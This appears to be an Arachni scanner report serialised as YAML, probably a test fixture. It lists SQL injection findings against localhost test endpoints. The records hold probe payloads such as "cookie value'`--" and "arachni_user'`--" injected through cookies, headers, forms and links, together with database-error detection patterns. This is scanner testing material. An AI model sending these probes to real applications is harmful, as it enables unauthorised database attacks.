response: ! '(PLS|ORA)-[0-9][0-9][0-9][0-9]
java.sql.SQLException
Oracle error
Oracle stuff Driver
Warning stuff oci_ stuff
Warning stuff ora_ stuff
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/oracle/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value'`--
:injected: cookie value'`--
:combo:
!binary "Y29va2llMg==": cookie value'`--
:action: http://localhost:7362/oracle/cookie/append
:verification:
:id: java.sql.SQLException
var: cookie2
url: http://localhost:7362/oracle/cookie/append
injected: cookie value'`--
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: cookie
remarks: {}
method: GET
response: ! '(PLS|ORA)-[0-9][0-9][0-9][0-9]
java.sql.SQLException
Oracle error
Oracle stuff Driver
Warning stuff oci_ stuff
Warning stuff ora_ stuff
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value'`--
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/oracle/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/oracle/cookie/flip
:verification:
:id: java.sql.SQLException
var: Parameter flip
url: http://localhost:7362/oracle/cookie/flip
injected: ''
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle
error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;)=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTUx
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1MiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/oracle/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/oracle/header/flip
:verification:
:id: java.sql.SQLException
var: Parameter flip
url: http://localhost:7362/oracle/header/flip
injected: ''
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "(PLS|ORA)-[0-9][0-9][0-9][0-9]\njava.sql.SQLException\nOracle
error\nOracle stuff Driver\nWarning stuff oci_ stuff\nWarning stuff ora_ stuff\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mjk2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMTo1OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/oracle/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:java\.sql\.SQLException)
:match: java.sql.SQLException
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/oracle/header/append
:verification:
:id: java.sql.SQLException
var: User-Agent
url: http://localhost:7362/oracle/header/append
injected: arachni_user'`--
id: java.sql.SQLException
regexp: (?i-mx:java\.sql\.SQLException)
regexp_match: java.sql.SQLException
elem: header
remarks: {}
method: GET
response: ! '(PLS|ORA)-[0-9][0-9][0-9][0-9]
java.sql.SQLException
Oracle error
Oracle stuff Driver
Warning stuff oci_ stuff
Warning stuff ora_ stuff
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTM2
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/coldfusion/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/coldfusion/form/append
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: input
url: http://localhost:7362/coldfusion/form/append
injected: default'`--
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: form
remarks: {}
method: GET
response: ! '[Macromedia][SQLServer JDBC Driver]
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MzY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/coldfusion/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: Parameter flip
:element: form
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
): !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/coldfusion/form/flip
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: Parameter flip
url: http://localhost:7362/coldfusion/form/flip
injected: ''
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: form
remarks: {}
method: GET
response: ! '["[Macromedia][SQLServer JDBC Driver]\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/coldfusion/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/coldfusion/link/flip?input=default
:verification:
:id: ! '[SQLServer JDBC Driver]'
var: Parameter flip
url: http://localhost:7362/coldfusion/link/flip?input=default
injected: ''
id: ! '[SQLServer JDBC Driver]'
regexp: (?i-mx:\[SQLServer JDBC Driver\])
regexp_match: ! '[SQLServer JDBC Driver]'
elem: link
remarks: {}
method: GET
response: ! '["[Macromedia][SQLServer JDBC Driver]\n", nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NDY=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxMjoxNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/coldfusion/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:\[SQLServer JDBC Driver\])
:match: ! '[SQLServer JDBC Driver]'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
